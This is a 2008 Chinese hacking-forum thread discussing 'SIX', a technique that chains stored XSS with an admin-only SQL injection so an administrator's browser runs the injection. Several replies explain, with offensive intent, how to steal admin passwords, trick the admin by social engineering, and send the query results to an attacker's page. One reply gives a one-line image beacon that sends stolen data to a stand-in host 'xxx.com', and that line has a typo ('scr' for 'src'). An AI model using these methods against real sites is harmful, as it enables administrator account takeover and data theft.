[讨论]xss-->crsf-->six six, crsf, xss, amp, 讨论

richy

[讨论]xss-->crsf-->six
议题作者：落叶纷飞
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

郁闷了，大家能讨论下six技术么？

现在网上就superhei的一篇文章～～一半懂一半不懂的.....

晕啦～

国外的也只能看懂一点

大家讨论下，如果一个系统有后台注入（假设mssql数据库），前台也有一个跨站，该怎么利用呢？

先不考虑直接update密码和挂马，盗cookies等

从six角度我们可以用select语句爆出网站管理员的密码，然后再把返回的页面保存到我们外部链接的一个网站里，这只是想，具体该怎么实现啊？主要是保存返回页面到我们外部连接的网站上这个代码该怎么写.....小鸡鸡重出江湖了~~！！
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经


heige
晶莹剔透§烈日灼然

slsam

SendUrl(m[1]);

这个可以用img　把m[1]　发给你接收的asp等
帖子6 精华0 积分23 阅读权限40 性别男 在线时间16 小时 注册时间2007-12-6 最后登录2008-2-1 查看详细资料TOP 您知道您年薪应是多少?

heige
晶莹剔透§烈日灼然

史达比克

有的不一定要xss　xsrf也行　还有不一定是sqlinj　也可以实现后台的功能　比如备用shell什么的　也行，six只是提供一个思路　：）
帖子6 精华0 积分23 阅读权限40 性别男 在线时间16 小时 注册时间2007-12-6 最后登录2008-2-1 查看详细资料TOP 爱要怎么说出口

28度的冰
荣誉会员

find-ok

如果是mssql，同时权限是sa。
能用几句SQL搞定的那就简单了。
xmlhttp post就post get就get
加上用户，就可以进去爽了。

如果database owner，那么可以考虑...算了，基本上不可以考虑。
access基本没用。不过我倒是有个想法，通过xmlhttp（用一个定时器），一方面注入后台，一方面到我们自己的页面1去读取注入语句，一方面提交注入结果到页面2。感觉累死了。而且，这样需要的javascript代码也很多，还是不好。

这个东西对开源的cms还是有一定用处的。I love amethyst！

帖子177 精华0 积分3622 阅读权限100 性别男 来自浙江 在线时间215 小时 注册时间2007-1-18 最后登录2008-7-21 查看个人网站
查看详细资料TOP

inking
荣誉会员

B仔爱玉米

引用:
引用第0楼落叶纷飞于2008-01-21 14:09发表的 [讨论]xss-->crsf-->six :
议题作者：落叶纷飞
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

主要是保存返回页面到我们外部连接的网站上这个代码该怎么写

.......
这个的话如果select成功，就直接document.write一个iframe标签到你的网站，通过url参数传递结果不就行了Inking's Blog http://www.inkings.cn
帖子64 精华0 积分3162 阅读权限100 在线时间116 小时 注册时间2007-5-26 最后登录2008-7-15 查看详细资料TOP 让女孩一夜变的更有女人味

kking
晶莹剔透§烈日灼然

30042912

Sql-injection In Xss ？
现在的人真奇怪，什么方法都要给个名字，话说这方法我自己想出来都用过了，今天才知道原来它叫SIX？

好吧，很简单，让我们假设有这样一个CMS（这个CMS确实存在，这里不暴光了）
在前台修改用户资料处写入的数据没有过滤XSS，但是在前台个人信息显示、用户信息查看、论坛用户信息显示等所有地方在输出的时候都进行了HTML过滤，但是在后台用户信息编辑的地方缺没有过滤（很多系统的前台和后台是分别的人开发的）。
在后台某个操作传参数的地方没有进行SQL检测，但该页面必须要管理员权限，而且后台需要验证COOKIES SESSION IP 三重机制。

那么我的做法是写JS AJAX脚本访问后台的该页面，并且将获得的页面结果再通过XMLHTTP发送到我的指定页面做POST提交保存路径及返回数据，这些都可以用AJAX来完成，代码就不写了，情况不一样代码也不一样，因为在个人用户信息编辑的地方仅仅做了 INPUT 的长度限制，而没有在 REQUEST 处做截取，所以我们可以写很长的JS代码提交过去。

就这样，然后用社工骗管理员去修改你的密码事，AJAX 代码会自动注入，然后将返回信息POST到你设置的页面中，当然如果站点是SQL数据库，那么直接UPDATE ADMIN PASSWORD，否则就写循环的AJAX 代码，不过这样会导致IE卡住。

这些是在白盒情况下的，如果是黑盒，可以仿造明小子 及 啊D 软件一样直接用JS获得当前URL，然后用蜘蛛方式所有可用URL进行检测，一旦发现注入点就自动POST到指定位置该注入点URL及返回信息。


不晓得我说清楚了没…http://www.vtwo.cn
帖子54 精华0 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

落叶纷飞
荣誉会员

VBS

引用:
引用第1楼heige于2008-01-21 21:45发表的 :
SendUrl(m[1]);

这个可以用img　把m[1]　发给你接收的asp等
谢谢superhei大哥回复啊，可以写个例子给我看看吗？

我太笨了，想了半天也不知道怎么写小鸡鸡重出江湖了~~！！
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 查看详细资料TOP 让女孩一夜变的更有女人味

落叶纷飞
荣誉会员

枫枫

引用:
引用第5楼kking于2008-01-22 16:39发表的 :
Sql-injection In Xss ？
现在的人真奇怪，什么方法都要给个名字，话说这方法我自己想出来都用过了，今天才知道原来它叫SIX？

好吧，很简单，让我们假设有这样一个CMS（这个CMS确实存在，这里不暴光了）
在前台修改用户资料处写入的数据没有过滤XSS，但是在前台个人信息显示、用户信息查看、论坛用户信息显示等所有地方在输出的时候都进行了HTML过滤，但是在后台用户信息编辑的地方缺没有过滤（很多系统的前台和后台是分别的人开发的）。
.......
谢谢这位大哥回复，我现在烦的是怎么把返回的信息post到我自己的网站上

写段代码例子给我参考下好吗？我实在太蠢了，老是想不出好的方法小鸡鸡重出江湖了~~！！
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 查看详细资料TOP

zj1244
晶莹剔透§烈日灼然

知了

引用:
引用第6楼落叶纷飞于2008-01-23 10:16发表的 :



谢谢superhei大哥回复啊，可以写个例子给我看看吗？

.......
dataimg=new Image();
dataimg.scr="http://xxx.com/x.asp?data=" + jjyy;
帖子5 精华0 积分17 阅读权限40 性别男 在线时间150 小时 注册时间2007-4-9 最后登录2008-6-18 查看详细资料TOP

heige
晶莹剔透§烈日灼然

M煲

引用:
引用第5楼kking于2008-01-22 16:39发表的 :
Sql-injection In Xss ？
现在的人真奇怪，什么方法都要给个名字，话说这方法我自己想出来都用过了，今天才知道原来它叫SIX？

好吧，很简单，让我们假设有这样一个CMS（这个CMS确实存在，这里不暴光了）
在前台修改用户资料处写入的数据没有过滤XSS，但是在前台个人信息显示、用户信息查看、论坛用户信息显示等所有地方在输出的时候都进行了HTML过滤，但是在后台用户信息编辑的地方缺没有过滤（很多系统的前台和后台是分别的人开发的）。
.......
郁闷～～，也太打击人了，好不容易上est想出个名啥的，就被bs了，我要去黑了你的bink
帖子6 精华0 积分23 阅读权限40 性别男 在线时间16 小时 注册时间2007-12-6 最后登录2008-2-1 查看详细资料TOP

瓜哥
晶莹剔透§烈日灼然

小斌斌

帖子2 精华0 积分9 阅读权限40 在线时间2 小时 注册时间2008-1-23 最后登录2008-1-30 查看详细资料TOP

落叶纷飞
荣誉会员

剑花江南

引用:
引用第8楼zj1244于2008-01-23 10:49发表的 :

dataimg=new Image();
dataimg.scr="http://xxx.com/x.asp?data=" + jjyy;
谢谢小葵大哥小鸡鸡重出江湖了~~！！
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间144 小时 注册时间2007-7-31 最后登录2008-7-21 查看详细资料TOP

茄子宝
荣誉会员

[TV]home

你们怎么都不仔细看黑锅的文章捏

话说我已经把黑锅的BLOG黑了~

http://superhei.blogbus.com/.....  -.= 凸

帖子160 精华4 积分3923 阅读权限100 性别男 在线时间403 小时 注册时间2005-4-4 最后登录2008-6-16 查看详细资料TOP

kking
晶莹剔透§烈日灼然

东莞大岭山

引用:
引用第9楼heige于2008-01-23 11:53发表的 :


郁闷～～，也太打击人了，好不容易上est想出个名啥的，就被bs了，我要去黑了你的bink
你是谁？知道我马甲的人可不多。。。

只怪你运气不好，我最近几个月难的上来溜达一下，哎。。

我那小站，想黑就去吧，不过如果你旁注或者从服务器进来的话我可不承认哦，要从脚本上黑，过两天我把站开起来欢迎你光临嘛。。http://www.vtwo.cn
帖子54 精华0 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 查看个人网站
查看详细资料TOP

kking
晶莹剔透§烈日灼然

路上不塞车

引用:
引用第7楼落叶纷飞于2008-01-23 10:19发表的 :



谢谢这位大哥回复，我现在烦的是怎么把返回的信息post到我自己的网站上

.......
XMLHTTP 以POST方式提交表单数据的例子网上很多，自己去改改就行了，代码不长，也就百多字而已。http://www.vtwo.cn
帖子54 精华0 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 查看个人网站
查看详细资料TOP

瓜哥
晶莹剔透§烈日灼然

bimuyu

帖子2 精华0 积分9 阅读权限40 在线时间2 小时 注册时间2008-1-23 最后登录2008-1-30 查看详细资料TOP

heige
晶莹剔透§烈日灼然